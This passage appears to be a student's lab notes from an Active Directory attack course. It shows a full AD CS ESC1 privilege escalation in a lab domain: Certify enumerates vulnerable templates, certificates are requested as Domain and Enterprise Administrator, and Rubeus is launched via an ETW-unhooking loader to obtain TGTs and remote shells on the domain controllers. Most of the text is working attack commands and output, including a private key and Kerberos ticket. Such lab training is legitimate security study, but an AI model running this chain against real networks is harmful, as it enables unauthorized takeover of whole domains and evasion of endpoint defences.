WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Certify completed in 00:00:15.7994434
C:\Users\student98>
.
The HTTPSCertificates template grants enrollment rights to RDPUsers group and allows requestor to supply Subject Name.
Recall that student98 is a member of RDPUsers group. This means that we can request certificate for any user as student98.
Let’s request a certificate for Domain Admin – Administrator:
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator
We copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it to esc1.pem.
We need to convert it to PFX to use it. Use openssl binary on the student VM to do that. I will use SecretPass@123 as the export password.
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP “Microsoft Enhanced Cryptographic Provider v1.0” -export -out C:\AD\Tools\esc1-DA.pfx
Use the PFX created above with Rubeus to request a TGT for DA – Administrator, [using dcorp domain]
summary:
c:\AD\Tools>C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : dcorp\student98
[*] No subject name specified, using current context as subject.
[*] Template : HTTPSCertificates
[*] Subject : CN=student98, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName : administrator
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 40
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAplrRlQeBSoQfoyWgAjdW8rLpCfXwWJjOCEgn3vbYMpbDhMsX
JAambLVcYcFhYvDdz6Yzw2SknL03HaZyWRYuAXF/kaemmT1wmwctqvWTNxPBeoUO
Eka63MrmYViBJXgMEPGqTtZLWSTBwTa9H3+cebxttHrRJkhizYWlvN0t64zmAVMv
vaTy2pBe/LvVMUTZQzy0JM95M+JUIq6HQbg2NFn8/g/j7t4Z9jSWK/8QlYdPzcdx
QJl9jAUzBqvm2TaA6kqqnp0LUFv8hOLKl2XuPQ6x/uW87MqR0UrXilkU2E4nh1+m
TynxjD6b+z6Kaj+kGqffRojCOB88elG17bX6tQIDAQABAoIBABOxQIoRv15g0ZXw
iEZ64pIMV8XUFUWHoSwdzop4UhN7AV4g5HZhSyYnOe5gg/TAaqGAHTSOH2Zmh7W8
1GBzXbLSCrXlULVnLoNLkD5in7CvaAHm6kmDke89HZR8c51J3rPKx8xZVcYRsdX7
ctvdsVo/0gTBXSzY+Mk3fu0iiaMOc+QOp15ixIWEPgw/GKZd1X4FCSOolWdDuGfO
+3P3cwMHA2pcxRAvcgjmhK0add8JmaIDuKZIDPzqrQ83kJ29aCEs7RVZlqrSYfkL
/GOFOV+aglqfmnAlVgykD/WQJxqdoD25WmQiYhKgnA81kl0aGE5+gnuG35PTMGsm
4bDpTykCgYEA2mD3mqR6B1QIGYcJ7nzzb6K6mQCWiqOCvUAsasQmO0XO7mxHkrXQ
lL6oXtuDu06D5UyFiUZap8rq5/Gj/wtXIFJiLOH7Ui5KTWC413rX5RlOPAolwnkr
PFVMOKutSVpL7fq1Zpgd1U4aTBvlnGayQBfcGpQ9yZ4UfmFn1wAbAOMCgYEAwwN3
YsZWcpxaFpYPt+4/M8dc2Ic54wUEl1zA9tdcjozNPJbskXjJ3eebm3GCKiHf9C+k
JyLPZCSBHc/pfJU/NVi2/D4pFMnc/ihjlUftXvlBBew8390GrYY4aeMW0aunc5Tt
j7g1rmQzAaw2XJoCSi/YNZ11kX4IwTAZ9FFb4YcCgYEAoA2LzCKacX6MRTFs/QdF
YF+zRWph65C1xMEhDMtgffbHGIXx2zw4eJxYSNW4cfK0xr1T7e3Lick2a/L10Hre
S4k1/VFPYsccnCO0tfGKBJaMeYKydBtcreaSa8KfyfBNUEl85Im+69RHf9q+aef2
4vTZ0/0sX/XlbU80zSZ9pCMCgYALQPn0w0ld19QDFanWjXMsQ8cB39vhU/rN2VZx
aEA5Ibr+Uh9YzcWofqMmN0ixsb7A0rcAYyvgtZKV69enjt1U8Meuis/IGVYdfKsy
hDIYlv2/n8Brks+9188NnUNF2kgRjXigIJtIcxPWdt+0PFcBfP1XKr0MJl/O9j2p
McDBpQKBgFef1e6GE/YHM+sBusWpIqac6ymd4MTG9b+GM6arXpoGxUkCjZj8uuIC
TGr3+zMqMkCiAOpGjOE8pZv+EjqtQ07FXSNpoUbGzI873sH1iXVIDePzPKtCWmDS
As8EU3Mb0J5mlgFr3tyycV3YEkNLdIZq6pWwvdV5LfrFFQBVx9bW
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGYTCCBUmgAwIBAgITFQAAACjVCkCBIhFPpQAAAAAAKDANBgkqhkiG9w0BAQsF
ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l
eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNTExMjcx
MzA2MTVaFw0yNzExMjcxMzE2MTVaMHIxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ
MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh
cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRIwEAYDVQQDEwlzdHVkZW50OTgwggEiMA0G
CSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCmWtGVB4FKhB+jJaACN1bysukJ9fBY
mM4ISCfe9tgylsOEyxckBqZstVxhwWFi8N3PpjPDZKScvTcdpnJZFi4BcX+Rp6aZ
PXCbBy2q9ZM3E8F6hQ4SRrrcyuZhWIEleAwQ8apO1ktZJMHBNr0ff5x5vG20etEm
SGLNhaW83S3rjOYBUy+9pPLakF78u9UxRNlDPLQkz3kz4lQirodBuDY0Wfz+D+Pu
3hn2NJYr/xCVh0/Nx3FAmX2MBTMGq+bZNoDqSqqenQtQW/yE4sqXZe49DrH+5bzs
ypHRSteKWRTYTieHX6ZPKfGMPpv7PopqP6Qap99GiMI4Hzx6UbXttfq1AgMBAAGj
ggMOMIIDCjA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiF4ahyh8yfaOGHJoKf
rlGC8vZ9gT+Gl492h7SEEgIBZAIBBjApBgNVHSUEIjAgBggrBgEFBQcDAgYIKwYB
BQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcVCgQo
MCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkqhkiG
9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYFKw4D
AgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFCcZTYlBbfiBti6CV1h+wZ+Q1mxxMCgG
A1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlzdHJhdG9yMB8GA1UdIwQY
MBaAFNH+jQqn+rQynzb8ILj3y55oxUXtMIHYBgNVHR8EgdAwgc0wgcqggceggcSG
gcFsZGFwOi8vL0NOPW1vbmV5Y29ycC1NQ09SUC1EQy1DQSxDTj1tY29ycC1kYyxD
Tj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
Q29uZmlndXJhdGlvbixEQz1tb25leWNvcnAsREM9bG9jYWw/Y2VydGlmaWNhdGVS
ZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBv
aW50MIHLBggrBgEFBQcBAQSBvjCBuzCBuAYIKwYBBQUHMAKGgatsZGFwOi8vL0NO
PW1vbmV5Y29ycC1NQ09SUC1EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIw
U2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tb25leWNv
cnAsREM9bG9jYWw/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp
ZmljYXRpb25BdXRob3JpdHkwDQYJKoZIhvcNAQELBQADggEBAAcWnFlEyTtdXFeh
98HvxfQTNGEJlqow3P6B5gdYVlPeGZi8B+3E2H15Vxi2vP+yrXzSIim8jPzfEDl0
MkERMlvDbqsJfpUKSg68PlD4FdCqSMzS13aPvwP5qhIOjortLahkfHhQScjMo70y
tchTciWr3E5q1AYkjy4roKHVh8p+tavxWOvNQMcldxtzS5g6wYJRNuKpsMt6JifV
ZWbdJBsdHectolrgseZ5z+o7UZSrXFfhkA9YAyd833xu7S5TqixELd0EizjNyWTJ
F4Dpukv2R3Xz62HSo0iyY1WSEsle0cBIOBFqdcnQVgRj7F3XqvNIVM3fua9wDYw4
TBoGjag=
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:10.2982772
c:\AD\Tools>notepad C:\ad\Tools\esc1.pem
c:\AD\Tools>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt
[*] Action: Ask TGT
[*] Got domain: dollarcorp.moneycorp.local
[*] Using PKINIT with etype rc4_hmac and subject: CN=student98, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWw=
[+] Ticket successfully imported!
ServiceName : krbtgt/dollarcorp.moneycorp.local
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 11/27/2025 5:26:07 AM
EndTime : 11/27/2025 3:26:07 PM
RenewTill : 12/4/2025 5:26:07 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : L1WkxZ3i0esXLN9gV/lm7A==
ASREP (key) : E23E84B1C77442465881A781D384B555
c:\AD\Tools>klist
Current LogonId is 0:0x31e69f3e
Cached Tickets: (1)
#0> Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 11/27/2025 5:26:07 (local)
End Time: 11/27/2025 15:26:07 (local)
Renew Time: 12/4/2025 5:26:07 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
c:\AD\Tools>winrs -r:dcorp-dc cmd /c set computername
COMPUTERNAME=DCORP-DC
c:\AD\Tools>winrs -r:dcorp-dc cmd /c set username
USERNAME=Administrator
c:\AD\Tools>
.
——
Next task
Rubeus.exe asktgt /user:administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt
Check if we actually have DA privileges now:
winrs -r:dcorp-dc cmd /c set username
Awesome! We can use similar method to escalate to Enterprise Admin privileges. Request a certificate for Enterprise Administrator – Administrator
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administratorSave the certificate to esc1-EA.pem and convert it to PFX. I will use SecretPass@123 as the export password:
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-EA.pfxUse Rubeus to request TGT for Enterprise Administrator – Administrator
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass@123 /ptt
Finally, access mcorp-dc!
winrs -r:mcorp-dc cmd /c set username
We have EA privileges!
2 – Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin
If we list vulnerable templates in moneycorp, we get the following result:
C:\AD\Tools\Certify.exe find /vulnerable _____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'
[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'
Enterprise CA Name : moneycorp-MCORP-DC-CA
DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
Allow ManageCA, ManageCertificates mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-3726368948-3917688648-513
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Certify completed in 00:00:15.9085914The “SmartCardEnrollment-Agent” template has EKU for Certificate Request Agent and grants enrollment rights to Domain users. If we can find another template that has an EKU that allows for domain authentication and has application policy requirement of certificate request agent, we can request certificate on behalf of any user.
C:\AD\Tools\Certify.exe find _____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'
[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'
Enterprise CA Name : moneycorp-MCORP-DC-CA
DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
Allow ManageCA, ManageCertificates mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Enrollment Agent Restrictions : None
[*] Available Certificates Templates :
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Users S-1-5-21-335606122-960912869-3279953914-513
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : EFS
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Encrypting File System
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Users S-1-5-21-335606122-960912869-3279953914-513
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : Administrator
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
